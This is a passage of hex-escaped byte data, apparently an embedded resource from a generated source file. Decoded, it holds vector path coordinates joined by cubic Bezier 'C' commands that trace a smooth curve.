\x2e\x32\x34\x30\x38\x30\x36\x33\x35\x34\x31\x20\x31\x30\x2e\x35\
\x35\x39\x39\x35\x33\x35\x31\x39\x37\x20\x43\x20\x31\x32\x2e\x32\
\x34\x37\x30\x34\x37\x34\x32\x32\x39\x20\x31\x30\x2e\x35\x39\x36\
\x34\x36\x32\x35\x35\x38\x31\x20\x31\x32\x2e\x32\x35\x33\x32\x38\
\x38\x34\x39\x31\x38\x20\x31\x30\x2e\x36\x33\x33\x33\x38\x32\x38\
\x36\x39\x20\x31\x32\x2e\x32\x35\x39\x35\x32\x39\x35\x36\x30\x36\
\x20\x31\x30\x2e\x36\x37\x30\x36\x38\x33\x35\x34\x35\x39\x20\x43\
\x20\x31\x32\x2e\x32\x36\x35\x37\x37\x30\x36\x32\x39\x34\x20\x31\
\x30\x2e\x37\x30\x37\x39\x38\x34\x32\x32\x32\x39\x20\x31\x32\x2e\
\x32\x37\x32\x30\x31\x31\x36\x39\x38\x33\x20\x31\x30\x2e\x37\x34\
\x35\x36\x36\x37\x35\x35\x31\x32\x20\x31\x32\x2e\x32\x37\x38\x32\
\x35\x32\x37\x36\x37\x31\x20\x31\x30\x2e\x37\x38\x33\x37\x30\x32\
\x32\x30\x37\x37\x20\x43\x20\x31\x32\x2e\x32\x38\x34\x34\x39\x33\
\x38\x33\x35\x39\x20\x31\x30\x2e\x38\x32\x31\x37\x33\x36\x38\x36\
\x34\x32\x20\x31\x32\x2e\x32\x39\x30\x37\x33\x34\x39\x30\x34\x38\
\x20\x31\x30\x2e\x38\x36\x30\x31\x32\x34\x39\x35\x39\x36\x20\x31\
\x32\x2e\x32\x39\x36\x39\x37\x35\x39\x37\x33\x36\x20\x31\x30\x2e\
\x38\x39\x38\x38\x33\x34\x38\x30\x32\x31\x20\x43\x20\x31\x32\x2e\
\x33\x30\x33\x32\x31\x37\x30\x34\x32\x35\x20\x31\x30\x2e\x39\x33\
\x37\x35\x34\x34\x36\x34\x34\x36\x20\x31\x32\x2e\x33\x30\x39\x34\
\x35\x38\x31\x31\x31\x33\x20\x31\x30\x2e\x39\x37\x36\x35\x37\x38\
\x31\x36\x37\x20\x31\x32\x2e\x33\x31\x35\x36\x39\x39\x31\x38\x30\
\x31\x20\x31\x31\x2e\x30\x31\x35\x39\x30\x33\x33\x35\x38\x33\x20\
\x43\x20\x31\x32\x2e\x33\x32\x31\x39\x34\x30\x32\x34\x39\x20\x31\
\x31\x2e\x30\x35\x35\x32\x32\x38\x35\x34\x39\x36\x20\x31\x32\x2e\
\x33\x32\x38\x31\x38\x31\x33\x31\x37\x38\x20\x31\x31\x2e\x30\x39\
\x34\x38\x34\x37\x31\x36\x31\x35\x20\x31\x32\x2e\x33\x33\x34\x34\
\x32\x32\x33\x38\x36\x36\x20\x31\x31\x2e\x31\x33\x34\x37\x32\x36\
\x39\x31\x33\x31\x20\x43\x20\x31\x32\x2e\x33\x34\x30\x36\x36\x33\
\x34\x35\x35\x35\x20\x31\x31\x2e\x31\x37\x34\x36\x30\x36\x36\x36\
\x34\x37\x20\x31\x32\x2e\x33\x34\x36\x39\x30\x34\x35\x32\x34\x33\
\x20\x31\x31\x2e\x32\x31\x34\x37\x34\x39\x31\x32\x34\x20\x31\x32\
\x2e\x33\x35\x33\x31\x34\x35\x35\x39\x33\x31\x20\x31\x31\x2e\x32\
\x35\x35\x31\x32\x31\x37\x39\x30\x33\x20\x43\x20\x31\x32\x2e\x33\
\x35\x39\x33\x38\x36\x36\x36\x32\x20\x31\x31\x2e\x32\x39\x35\x34\
\x39\x34\x34\x35\x36\x35\x20\x31\x32\x2e\x33\x36\x35\x36\x32\x37\
\x37\x33\x30\x38\x20\x31\x31\x2e\x33\x33\x36\x30\x39\x38\x37\x31\
\x31\x35\x20\x31\x32\x2e\x33\x37\x31\x38\x36\x38\x37\x39\x39\x36\
\x20\x31\x31\x2e\x33\x37\x36\x39\x30\x31\x38\x38\x34\x38\x20\x43\
\x20\x31\x32\x2e\x33\x37\x38\x31\x30\x39\x38\x36\x38\x35\x20\x31\
\x31\x2e\x34\x31\x37\x37\x30\x35\x30\x35\x38\x20\x31\x32\x2e\x33\
\x38\x34\x33\x35\x30\x39\x33\x37\x33\x20\x31\x31\x2e\x34\x35\x38\
\x37\x30\x38\x33\x34\x33\x31\x20\x31\x32\x2e\x33\x39\x30\x35\x39\
\x32\x30\x30\x36\x32\x20\x31\x31\x2e\x34\x39\x39\x38\x37\x38\x39\
\x35\x30\x32\x20\x43\x20\x31\x32\x2e\x33\x39\x36\x38\x33\x33\x30\
\x37\x35\x20\x31\x31\x2e\x35\x34\x31\x30\x34\x39\x35\x35\x37\x34\
\x20\x31\x32\x2e\x34\x30\x33\x30\x37\x34\x31\x34\x33\x38\x20\x31\
\x31\x2e\x35\x38\x32\x33\x38\x38\x34\x39\x30\x31\x20\x31\x32\x2e\
\x34\x30\x39\x33\x31\x35\x32\x31\x32\x37\x20\x31\x31\x2e\x36\x32\
\x33\x38\x36\x32\x38\x39\x30\x31\x20\x43\x20\x31\x32\x2e\x34\x31\
\x35\x35\x35\x36\x32\x38\x31\x35\x20\x31\x31\x2e\x36\x36\x35\x33\
\x33\x37\x32\x39\x20\x31\x32\x2e\x34\x32\x31\x37\x39\x37\x33\x35\
\x30\x33\x20\x31\x31\x2e\x37\x30\x36\x39\x34\x37\x39\x36\x39\x31\
\x20\x31\x32\x2e\x34\x32\x38\x30\x33\x38\x34\x31\x39\x32\x20\x31\
\x31\x2e\x37\x34\x38\x36\x36\x32\x30\x35\x31\x33\x20\x43\x20\x31\
\x32\x2e\x34\x33\x34\x32\x37\x39\x34\x38\x38\x20\x31\x31\x2e\x37\
\x39\x30\x33\x37\x36\x31\x33\x33\x34\x20\x31\x32\x2e\x34\x34\x30\
\x35\x32\x30\x35\x35\x36\x38\x20\x31\x31\x2e\x38\x33\x32\x31\x39\
\x34\x32\x33\x37\x35\x20\x31\x32\x2e\x34\x34\x36\x37\x36\x31\x36\
\x32\x35\x37\x20\x31\x31\x2e\x38\x37\x34\x30\x38\x33\x35\x32\x30\
\x36\x20\x43\x20\x31\x32\x2e\x34\x35\x33\x30\x30\x32\x36\x39\x34\
\x35\x20\x31\x31\x2e\x39\x31\x35\x39\x37\x32\x38\x30\x33\x37\x20\
\x31\x32\x2e\x34\x35\x39\x32\x34\x33\x37\x36\x33\x34\x20\x31\x31\
\x2e\x39\x35\x37\x39\x33\x33\x36\x39\x30\x39\x20\x31\x32\x2e\x34\
\x36\x35\x34\x38\x34\x38\x33\x32\x32\x20\x31\x31\x2e\x39\x39\x39\
\x39\x33\x33\x34\x32\x33\x20\x43\x20\x31\x32\x2e\x34\x37\x31\x37\
\x32\x35\x39\x30\x31\x20\x31\x32\x2e\x30\x34\x31\x39\x33\x33\x31\
\x35\x35\x31\x20\x31\x32\x2e\x34\x37\x37\x39\x36\x36\x39\x36\x39\
\x39\x20\x31\x32\x2e\x30\x38\x33\x39\x37\x31\x39\x36\x32\x37\x20\
\x31\x32\x2e\x34\x38\x34\x32\x30\x38\x30\x33\x38\x37\x20\x31\x32\
\x2e\x31\x32\x36\x30\x31\x37\x32\x32\x31\x31\x20\x43\x20\x31\x32\
\x2e\x34\x39\x30\x34\x34\x39\x31\x30\x37\x35\x20\x31\x32\x2e\x31\
\x36\x38\x30\x36\x32\x34\x37\x39\x34\x20\x31\x32\x2e\x34\x39\x36\
\x36\x39\x30\x31\x37\x36\x34\x20\x31\x32\x2e\x32\x31\x30\x31\x31\
\x34\x32\x32\x34\x32\x20\x31\x32\x2e\x35\x30\x32\x39\x33\x31\x32\
\x34\x35\x32\x20\x31\x32\x2e\x32\x35\x32\x31\x34\x30\x30\x31\x35\
\x38\x20\x43\x20\x31\x32\x2e\x35\x30\x39\x31\x37\x32\x33\x31\x34\
\x20\x31\x32\x2e\x32\x39\x34\x31\x36\x35\x38\x30\x37\x33\x20\x31\
\x32\x2e\x35\x31\x35\x34\x31\x33\x33\x38\x32\x39\x20\x31\x32\x2e\
\x33\x33\x36\x31\x36\x35\x34\x38\x36\x32\x20\x31\x32\x2e\x35\x32\
\x31\x36\x35\x34\x34\x35\x31\x37\x20\x31\x32\x2e\x33\x37\x38\x31\
\x30\x36\x38\x34\x37\x39\x20\x43\x20\x31\x32\x2e\x35\x32\x37\x38\
\x39\x35\x35\x32\x30\x36\x20\x31\x32\x2e\x34\x32\x30\x30\x34\x38\
\x32\x30\x39\x35\x20\x31\x32\x2e\x35\x33\x34\x31\x33\x36\x35\x38\
\x39\x34\x20\x31\x32\x2e\x34\x36\x31\x39\x33\x30\x39\x20\x31\x32\
\x2e\x35\x34\x30\x33\x37\x37\x36\x35\x38\x32\x20\x31\x32\x2e\x35\
\x30\x33\x37\x32\x32\x39\x39\x39\x33\x20\x43\x20\x31\x32\x2e\x35\
\x34\x36\x36\x31\x38\x37\x32\x37\x31\x20\x31\x32\x2e\x35\x34\x35\
\x35\x31\x35\x30\x39\x38\x36\x20\x31\x32\x2e\x35\x35\x32\x38\x35\
\x39\x37\x39\x35\x39\x20\x31\x32\x2e\x35\x38\x37\x32\x31\x36\x30\
\x35\x38\x37\x20\x31\x32\x2e\x35\x35\x39\x31\x30\x30\x38\x36\x34\
\x37\x20\x31\x32\x2e\x36\x32\x38\x37\x39\x34\x32\x39\x33\x39\x20\
\x43\x20\x31\x32\x2e\x35\x36\x35\x33\x34\x31\x39\x33\x33\x36\x20\
\x31\x32\x2e\x36\x37\x30\x33\x37\x32\x35\x32\x39\x31\x20\x31\x32\
\x2e\x35\x37\x31\x35\x38\x33\x30\x30\x32\x34\x20\x31\x32\x2e\x37\
\x31\x31\x38\x32\x37\x32\x39\x38\x20\x31\x32\x2e\x35\x37\x37\x38\
\x32\x34\x30\x37\x31\x32\x20\x31\x32\x2e\x37\x35\x33\x31\x32\x37\
\x33\x39\x37\x39\x20\x43\x20\x31\x32\x2e\x35\x38\x34\x30\x36\x35\
\x31\x34\x30\x31\x20\x31\x32\x2e\x37\x39\x34\x34\x32\x37\x34\x39\
\x37\x38\x20\x31\x32\x2e\x35\x39\x30\x33\x30\x36\x32\x30\x38\x39\
\x20\x31\x32\x2e\x38\x33\x35\x35\x37\x31\x39\x39\x35\x31\x20\x31\
\x32\x2e\x35\x39\x36\x35\x34\x37\x32\x37\x37\x37\x20\x31\x32\x2e\
\x38\x37\x36\x35\x33\x30\x31\x31\x38\x35\x20\x43\x20\x31\x32\x2e\
\x36\x30\x32\x37\x38\x38\x33\x34\x36\x36\x20\x31\x32\x2e\x39\x31\
\x37\x34\x38\x38\x32\x34\x31\x38\x20\x31\x32\x2e\x36\x30\x39\x30\
\x32\x39\x34\x31\x35\x34\x20\x31\x32\x2e\x39\x35\x38\x32\x35\x38\
\x38\x36\x36\x39\x20\x31\x32\x2e\x36\x31\x35\x32\x37\x30\x34\x38\
\x34\x33\x20\x31\x32\x2e\x39\x39\x38\x38\x31\x31\x37\x30\x31\x31\
\x20\x43\x20\x31\x32\x2e\x36\x32\x31\x35\x31\x31\x35\x35\x33\x31\
\x20\x31\x33\x2e\x30\x33\x39\x33\x36\x34\x35\x33\x35\x32\x20\x31\
\x32\x2e\x36\x32\x37\x37\x35\x32\x36\x32\x31\x39\x20\x31\x33\x2e\
\x30\x37\x39\x36\x39\x38\x32\x36\x35\x33\x20\x31\x32\x2e\x36\x33\
\x33\x39\x39\x33\x36\x39\x30\x38\x20\x31\x33\x2e\x31\x31\x39\x37\
\x38\x33\x31\x32\x34\x32\x20\x43\x20\x31\x32\x2e\x36\x34\x30\x32\
\x33\x34\x37\x35\x39\x36\x20\x31\x33\x2e\x31\x35\x39\x38\x36\x37\
\x39\x38\x33\x31\x20\x31\x32\x2e\x36\x34\x36\x34\x37\x35\x38\x32\
\x38\x34\x20\x31\x33\x2e\x31\x39\x39\x37\x30\x32\x34\x37\x30\x36\
\x20\x31\x32\x2e\x36\x35\x32\x37\x31\x36\x38\x39\x37\x33\x20\x31\
\x33\x2e\x32\x33\x39\x32\x35\x37\x33\x39\x31\x35\x20\x43\x20\x31\
\x32\x2e\x36\x35\x38\x39\x35\x37\x39\x36\x36\x31\x20\x31\x33\x2e\
\x32\x37\x38\x38\x31\x32\x33\x31\x32\x33\x20\x31\x32\x2e\x36\x36\
\x35\x31\x39\x39\x30\x33\x34\x39\x20\x31\x33\x2e\x33\x31\x38\x30\
\x38\x35\x39\x38\x31\x37\x20\x31\x32\x2e\x36\x37\x31\x34\x34\x30\
\x31\x30\x33\x38\x20\x31\x33\x2e\x33\x35\x37\x30\x34\x39\x38\x32\
\x30\x39\x20\x43\x20\x31\x32\x2e\x36\x37\x37\x36\x38\x31\x31\x37\
\x32\x36\x20\x31\x33\x2e\x33\x39\x36\x30\x31\x33\x36\x36\x30\x32\
\x20\x31\x32\x2e\x36\x38\x33\x39\x32\x32\x32\x34\x31\x35\x20\x31\
\x33\x2e\x34\x33\x34\x36\x36\x35\x38\x30\x32\x36\x20\x31\x32\x2e\
\x36\x39\x30\x31\x36\x33\x33\x31\x30\x33\x20\x31\x33\x2e\x34\x37\
\x32\x39\x37\x38\x33\x33\x30\x33\x20\x43\x20\x31\x32\x2e\x36\x39\
\x36\x34\x30\x34\x33\x37\x39\x31\x20\x31\x33\x2e\x35\x31\x31\x32\
\x39\x30\x38\x35\x38\x31\x20\x31\x32\x2e\x37\x30\x32\x36\x34\x35\
\x34\x34\x38\x20\x31\x33\x2e\x35\x34\x39\x32\x36\x31\x37\x32\x35\
\x34\x20\x31\x32\x2e\x37\x30\x38\x38\x38\x36\x35\x31\x36\x38\x20\
\x31\x33\x2e\x35\x38\x36\x38\x36\x33\x37\x31\x38\x36\x20\x43\x20\
\x31\x32\x2e\x37\x31\x35\x31\x32\x37\x35\x38\x35\x36\x20\x31\x33\
\x2e\x36\x32\x34\x34\x36\x35\x37\x31\x31\x38\x20\x31\x32\x2e\x37\
\x32\x31\x33\x36\x38\x36\x35\x34\x35\x20\x31\x33\x2e\x36\x36\x31\
\x36\x39\x36\x36\x30\x39\x31\x20\x31\x32\x2e\x37\x32\x37\x36\x30\
\x39\x37\x32\x33\x33\x20\x31\x33\x2e\x36\x39\x38\x35\x32\x39\x39\
\x34\x33\x20\x43\x20\x31\x32\x2e\x37\x33\x33\x38\x35\x30\x37\x39\
\x32\x31\x20\x31\x33\x2e\x37\x33\x35\x33\x36\x33\x32\x37\x36\x39\
\x20\x31\x32\x2e\x37\x34\x30\x30\x39\x31\x38\x36\x31\x20\x31\x33\
\x2e\x37\x37\x31\x37\x39\x36\x36\x35\x33\x31\x20\x31\x32\x2e\x37\
\x34\x36\x33\x33\x32\x39\x32\x39\x38\x20\x31\x33\x2e\x38\x30\x37\
\x38\x30\x34\x33\x39\x31\x31\x20\x43\x20\x31\x32\x2e\x37\x35\x32\
\x35\x37\x33\x39\x39\x38\x36\x20\x31\x33\x2e\x38\x34\x33\x38\x31\
\x32\x31\x32\x39\x31\x20\x31\x32\x2e\x37\x35\x38\x38\x31\x35\x30\
\x36\x37\x35\x20\x31\x33\x2e\x38\x37\x39\x33\x39\x31\x36\x36\x35\
\x38\x20\x31\x32\x2e\x37\x36\x35\x30\x35\x36\x31\x33\x36\x33\x20\
\x31\x33\x2e\x39\x31\x34\x35\x31\x38\x31\x34\x37\x36\x20\x43\x20\
\x31\x32\x2e\x37\x37\x31\x32\x39\x37\x32\x30\x35\x32\x20\x31\x33\
\x2e\x39\x34\x39\x36\x34\x34\x36\x32\x39\x34\x20\x31\x32\x2e\x37\
\x37\x37\x35\x33\x38\x32\x37\x34\x20\x31\x33\x2e\x39\x38\x34\x33\
\x31\x35\x33\x32\x38\x32\x20\x31\x32\x2e\x37\x38\x33\x37\x37\x39\
\x33\x34\x32\x38\x20\x31\x34\x2e\x30\x31\x38\x35\x30\x36\x32\x35\
\x35\x36\x20\x43\x20\x31\x32\x2e\x37\x39\x30\x30\x32\x30\x34\x31\
\x31\x37\x20\x31\x34\x2e\x30\x35\x32\x36\x39\x37\x31\x38\x33\x20\
\x31\x32\x2e\x37\x39\x36\x32\x36\x31\x34\x38\x30\x35\x20\x31\x34\
\x2e\x30\x38\x36\x34\x30\x35\x34\x35\x30\x33\x20\x31\x32\x2e\x38\
\x30\x32\x35\x30\x32\x35\x34\x39\x33\x20\x31\x34\x2e\x31\x31\x39\
\x36\x30\x37\x39\x37\x31\x33\x20\x43\x20\x31\x32\x2e\x38\x30\x38\
\x37\x34\x33\x36\x31\x38\x32\x20\x31\x34\x2e\x31\x35\x32\x38\x31\
\x30\x34\x39\x32\x34\x20\x31\x32\x2e\x38\x31\x34\x39\x38\x34\x36\
\x38\x37\x20\x31\x34\x2e\x31\x38\x35\x35\x30\x34\x32\x32\x32\x33\
\x20\x31\x32\x2e\x38\x32\x31\x32\x32\x35\x37\x35\x35\x38\x20\x31\
\x34\x2e\x32\x31\x37\x36\x36\x37\x30\x31\x32\x39\x20\x43\x20\x31\
\x32\x2e\x38\x32\x37\x34\x36\x36\x38\x32\x34\x37\x20\x31\x34\x2e\
\x32\x34\x39\x38\x32\x39\x38\x30\x33\x36\x20\x31\x32\x2e\x38\x33\
\x33\x37\x30\x37\x38\x39\x33\x35\x20\x31\x34\x2e\x32\x38\x31\x34\
\x35\x38\x34\x35\x38\x35\x20\x31\x32\x2e\x38\x33\x39\x39\x34\x38\
\x39\x36\x32\x34\x20\x31\x34\x2e\x33\x31\x32\x35\x33\x31\x38\x30\
\x31\x38\x20\x43\x20\x31\x32\x2e\x38\x34\x36\x31\x39\x30\x30\x33\
\x31\x32\x20\x31\x34\x2e\x33\x34\x33\x36\x30\x35\x31\x34\x35\x31\
\x20\x31\x32\x2e\x38\x35\x32\x34\x33\x31\x31\x20\x31\x34\x2e\x33\
\x37\x34\x31\x31\x39\x38\x33\x33\x39\x20\x31\x32\x2e\x38\x35\x38\
\x36\x37\x32\x31\x36\x38\x39\x20\x31\x34\x2e\x34\x30\x34\x30\x35\
\x35\x36\x39\x37\x20\x43\x20\x31\x32\x2e\x38\x36\x34\x39\x31\x33\
\x32\x33\x37\x37\x20\x31\x34\x2e\x34\x33\x33\x39\x39\x31\x35\x36\
\x30\x31\x20\x31\x32\x2e\x38\x37\x31\x31\x35\x34\x33\x30\x36\x35\
\x20\x31\x34\x2e\x34\x36\x33\x33\x34\x35\x31\x31\x33\x34\x20\x31\
\x32\x2e\x38\x37\x37\x33\x39\x35\x33\x37\x35\x34\x20\x31\x34\x2e\
\x34\x39\x32\x30\x39\x37\x32\x32\x31\x39\x20\x43\x20\x31\x32\x2e\
\x38\x38\x33\x36\x33\x36\x34\x34\x34\x32\x20\x31\x34\x2e\x35\x32\
\x30\x38\x34\x39\x33\x33\x30\x33\x20\x31\x32\x2e\x38\x38\x39\x38\
\x37\x37\x35\x31\x33\x20\x31\x34\x2e\x35\x34\x38\x39\x39\x36\x33\
\x37\x33\x37\x20\x31\x32\x2e\x38\x39\x36\x31\x31\x38\x35\x38\x31\
\x39\x20\x31\x34\x2e\x35\x37\x36\x35\x32\x30\x32\x38\x32\x38\x20\
\x43\x20\x31\x32\x2e\x39\x30\x32\x33\x35\x39\x36\x35\x30\x37\x20\
\x31\x34\x2e\x36\x30\x34\x30\x34\x34\x31\x39\x31\x38\x20\x31\x32\
\x2e\x39\x30\x38\x36\x30\x30\x37\x31\x39\x35\x20\x31\x34\x2e\x36\
\x33\x30\x39\x34\x31\x32\x31\x36\x20\x31\x32\x2e\x39\x31\x34\x38\
\x34\x31\x37\x38\x38\x34\x20\x31\x34\x2e\x36\x35\x37\x31\x39\x34\
\x33\x37\x39\x35\x20\x43\x20\x31\x32\x2e\x39\x32\x31\x30\x38\x32\
\x38\x35\x37\x32\x20\x31\x34\x2e\x36\x38\x33\x34\x34\x37\x35\x34\
\x33\x20\x31\x32\x2e\x39\x32\x37\x33\x32\x33\x39\x32\x36\x31\x20\
\x31\x34\x2e\x37\x30\x39\x30\x35\x32\x39\x37\x30\x37\x20\x31\x32\
\x2e\x39\x33\x33\x35\x36\x34\x39\x39\x34\x39\x20\x31\x34\x2e\x37\
\x33\x33\x39\x39\x34\x38\x30\x36\x38\x20\x43\x20\x31\x32\x2e\x39\
\x33\x39\x38\x30\x36\x30\x36\x33\x37\x20\x31\x34\x2e\x37\x35\x38\
\x39\x33\x36\x36\x34\x33\x20\x31\x32\x2e\x39\x34\x36\x30\x34\x37\
\x31\x33\x32\x36\x20\x31\x34\x2e\x37\x38\x33\x32\x31\x30\x38\x39\
\x33\x37\x20\x31\x32\x2e\x39\x35\x32\x32\x38\x38\x32\x30\x31\x34\
\x20\x31\x34\x2e\x38\x30\x36\x38\x30\x32\x38\x34\x37\x36\x20\x43\
\x20\x31\x32\x2e\x39\x35\x38\x35\x32\x39\x32\x37\x30\x32\x20\x31\
\x34\x2e\x38\x33\x30\x33\x39\x34\x38\x30\x31\x35\x20\x31\x32\x2e\
\x39\x36\x34\x37\x37\x30\x33\x33\x39\x31\x20\x31\x34\x2e\x38\x35\
\x33\x33\x30\x30\x33\x35\x32\x34\x20\x31\x32\x2e\x39\x37\x31\x30\
\x31\x31\x34\x30\x37\x39\x20\x31\x34\x2e\x38\x37\x35\x35\x30\x35\
\x39\x35\x35\x39\x20\x43\x20\x31\x32\x2e\x39\x37\x37\x32\x35\x32\
\x34\x37\x36\x37\x20\x31\x34\x2e\x38\x39\x37\x37\x31\x31\x35\x35\
\x39\x34\x20\x31\x32\x2e\x39\x38\x33\x34\x39\x33\x35\x34\x35\x36\
\x20\x31\x34\x2e\x39\x31\x39\x32\x31\x33\x30\x30\x33\x33\x20\x31\
\x32\x2e\x39\x38\x39\x37\x33\x34\x36\x31\x34\x34\x20\x31\x34\x2e\
\x39\x33\x39\x39\x39\x37\x39\x33\x31\x32\x20\x43\x20\x31\x32\x2e\
\x39\x39\x35\x39\x37\x35\x36\x38\x33\x33\x20\x31\x34\x2e\x39\x36\
\x30\x37\x38\x32\x38\x35\x39\x31\x20\x31\x33\x2e\x30\x30\x32\x32\
\x31\x36\x37\x35\x32\x31\x20\x31\x34\x2e\x39\x38\x30\x38\x34\x36\
\x39\x35\x39\x33\x20\x31\x33\x2e\x30\x30\x38\x34\x35\x37\x38\x32\
\x30\x39\x20\x31\x35\x2e\x30\x30\x30\x31\x37\x39\x30\x38\x32\x35\
\x20\x43\x20\x31\x33\x2e\x30\x31\x34\x36\x39\x38\x38\x38\x39\x38\
\x20\x31\x35\x2e\x30\x31\x39\x35\x31\x31\x32\x30\x35\x38\x20\x31\
\x33\x2e\x30\x32\x30\x39\x33\x39\x39\x35\x38\x36\x20\x31\x35\x2e\
\x30\x33\x38\x31\x30\x36\x39\x34\x37\x33\x20\x31\x33\x2e\x30\x32\
\x37\x31\x38\x31\x30\x32\x37\x34\x20\x31\x35\x2e\x30\x35\x35\x39\
\x35\x36\x33\x38\x32\x35\x20\x43\x20\x31\x33\x2e\x30\x33\x33\x34\
\x32\x32\x30\x39\x36\x33\x20\x31\x35\x2e\x30\x37\x33\x38\x30\x35\
\x38\x31\x37\x36\x20\x31\x33\x2e\x30\x33\x39\x36\x36\x33\x31\x36\
\x35\x31\x20\x31\x35\x2e\x30\x39\x30\x39\x30\x34\x34\x35\x35\x35\
\x20\x31\x33\x2e\x30\x34\x35\x39\x30\x34\x32\x33\x33\x39\x20\x31\
\x35\x2e\x31\x30\x37\x32\x34\x33\x36\x31\x31\x32\x20\x43\x20\x31\
\x33\x2e\x30\x35\x32\x31\x34\x35\x33\x30\x32\x38\x20\x31\x35\x2e\
\x31\x32\x33\x35\x38\x32\x37\x36\x36\x38\x20\x31\x33\x2e\x30\x35\
\x38\x33\x38\x36\x33\x37\x31\x36\x20\x31\x35\x2e\x31\x33\x39\x31\
\x35\x37\x38\x37\x30\x31\x20\x31\x33\x2e\x30\x36\x34\x36\x32\x37\
\x34\x34\x30\x35\x20\x31\x35\x2e\x31\x35\x33\x39\x36\x31\x34\x38\
\x39\x33\x20\x43\x20\x31\x33\x2e\x30\x37\x30\x38\x36\x38\x35\x30\
\x39\x33\x20\x31\x35\x2e\x31\x36\x38\x37\x36\x35\x31\x30\x38\x35\
\x20\x31\x33\x2e\x30\x37\x37\x31\x30\x39\x35\x37\x38\x31\x20\x31\
\x35\x2e\x31\x38\x32\x37\x39\x32\x36\x30\x31\x34\x20\x31\x33\x2e\
\x30\x38\x33\x33\x35\x30\x36\x34\x37\x20\x31\x35\x2e\x31\x39\x36\
\x30\x33\x37\x38\x30\x30\x39\x20\x43\x20\x31\x33\x2e\x30\x38\x39\
\x35\x39\x31\x37\x31\x35\x38\x20\x31\x35\x2e\x32\x30\x39\x32\x38\
\x33\x30\x30\x30\x34\x20\x31\x33\x2e\x30\x39\x35\x38\x33\x32\x37\
\x38\x34\x36\x20\x31\x35\x2e\x32\x32\x31\x37\x34\x31\x31\x39\x39\
\x35\x20\x31\x33\x2e\x31\x30\x32\x30\x37\x33\x38\x35\x33\x35\x20\
\x31\x35\x2e\x32\x33\x33\x34\x30\x37\x35\x30\x35\x20\x43\x20\x31\
\x33\x2e\x31\x30\x38\x33\x31\x34\x39\x32\x32\x33\x20\x31\x35\x2e\
\x32\x34\x35\x30\x37\x33\x38\x31\x30\x35\x20\x31\x33\x2e\x31\x31\
\x34\x35\x35\x35\x39\x39\x31\x31\x20\x31\x35\x2e\x32\x35\x35\x39\
\x34\x33\x34\x35\x37\x38\x20\x31\x33\x2e\x31\x32\x30\x37\x39\x37\
\x30\x36\x20\x31\x35\x2e\x32\x36\x36\x30\x31\x32\x38\x33\x35\x37\
\x20\x43\x20\x31\x33\x2e\x31\x32\x37\x30\x33\x38\x31\x32\x38\x38\
\x20\x31\x35\x2e\x32\x37\x36\x30\x38\x32\x32\x31\x33\x36\x20\x31\
\x33\x2e\x31\x33\x33\x32\x37\x39\x31\x39\x37\x36\x20\x31\x35\x2e\
\x32\x38\x35\x33\x34\x36\x35\x30\x37\x31\x20\x31\x33\x2e\x31\x33\
\x39\x35\x32\x30\x32\x36\x36\x35\x20\x31\x35\x2e\x32\x39\x33\x38\
\x30\x33\x33\x39\x32\x32\x20\x43\x20\x31\x33\x2e\x31\x34\x35\x37\
\x36\x31\x33\x33\x35\x33\x20\x31\x35\x2e\x33\x30\x32\x32\x36\x30\
\x32\x37\x37\x33\x20\x31\x33\x2e\x31\x35\x32\x30\x30\x32\x34\x30\
\x34\x32\x20\x31\x35\x2e\x33\x30\x39\x39\x30\x34\x38\x39\x36\x32\
\x20\x31\x33\x2e\x31\x35\x38\x32\x34\x33\x34\x37\x33\x20\x31\x35\
\x2e\x33\x31\x36\x37\x33\x36\x32\x31\x36\x20\x43\x20\x31\x33\x2e\
\x31\x36\x34\x34\x38\x34\x35\x34\x31\x38\x20\x31\x35\x2e\x33\x32\
\x33\x35\x36\x37\x35\x33\x35\x38\x20\x31\x33\x2e\x31\x37\x30\x37\
\x32\x35\x36\x31\x30\x37\x20\x31\x35\x2e\x33\x32\x39\x35\x38\x30\
\x36\x36\x33\x33\x20\x31\x33\x2e\x31\x37\x36\x39\x36\x36\x36\x37\
\x39\x35\x20\x31\x35\x2e\x33\x33\x34\x37\x37\x35\x38\x35\x38\x20\
\x43\x20\x31\x33\x2e\x31\x38\x33\x32\x30\x37\x37\x34\x38\x33\x20\
\x31\x35\x2e\x33\x33\x39\x39\x37\x31\x30\x35\x32\x37\x20\x31\x33\
\x2e\x31\x38\x39\x34\x34\x38\x38\x31\x37\x32\x20\x31\x35\x2e\x33\
\x34\x34\x33\x34\x33\x33\x39\x33\x37\x20\x31\x33\x2e\x31\x39\x35\
\x36\x38\x39\x38\x38\x36\x20\x31\x35\x2e\x33\x34\x37\x38\x39\x34\
\x34\x33\x32\x36\x20\x43\x20\x31\x33\x2e\x32\x30\x31\x39\x33\x30\
\x39\x35\x34\x38\x20\x31\x35\x2e\x33\x35\x31\x34\x34\x35\x34\x37\
\x31\x34\x20\x31\x33\x2e\x32\x30\x38\x31\x37\x32\x30\x32\x33\x37\
\x20\x31\x35\x2e\x33\x35\x34\x31\x37\x30\x32\x36\x37\x32\x20\x31\
\x33\x2e\x32\x31\x34\x34\x31\x33\x30\x39\x32\x35\x20\x31\x35\x2e\
\x33\x35\x36\x30\x37\x31\x36\x36\x31\x32\x20\x43\x20\x31\x33\x2e\
\x32\x32\x30\x36\x35\x34\x31\x36\x31\x34\x20\x31\x35\x2e\x33\x35\
\x37\x39\x37\x33\x30\x35\x35\x31\x20\x31\x33\x2e\x32\x32\x36\x38\
\x39\x35\x32\x33\x30\x32\x20\x31\x35\x2e\x33\x35\x39\x30\x34\x36\
\x30\x39\x33\x38\x20\x31\x33\x2e\x32\x33\x33\x31\x33\x36\x32\x39\
\x39\x20\x31\x35\x2e\x33\x35\x39\x32\x39\x34\x39\x30\x33\x36\x20\
\x43\x20\x31\x33\x2e\x32\x33\x39\x33\x37\x37\x33\x36\x37\x39\x20\
\x31\x35\x2e\x33\x35\x39\x35\x34\x33\x37\x31\x33\x35\x20\x31\x33\
\x2e\x32\x34\x35\x36\x31\x38\x34\x33\x36\x37\x20\x31\x35\x2e\x33\
\x35\x38\x39\x36\x33\x33\x33\x36\x32\x20\x31\x33\x2e\x32\x35\x31\
\x38\x35\x39\x35\x30\x35\x35\x20\x31\x35\x2e\x33\x35\x37\x35\x35\
\x39\x31\x37\x37\x34\x20\x43\x20\x31\x33\x2e\x32\x35\x38\x31\x30\
\x30\x35\x37\x34\x34\x20\x31\x35\x2e\x33\x35\x36\x31\x35\x35\x30\
\x31\x38\x35\x20\x31\x33\x2e\x32\x36\x34\x33\x34\x31\x36\x34\x33\
\x32\x20\x31\x35\x2e\x33\x35\x33\x39\x32\x32\x31\x32\x32\x35\x20\
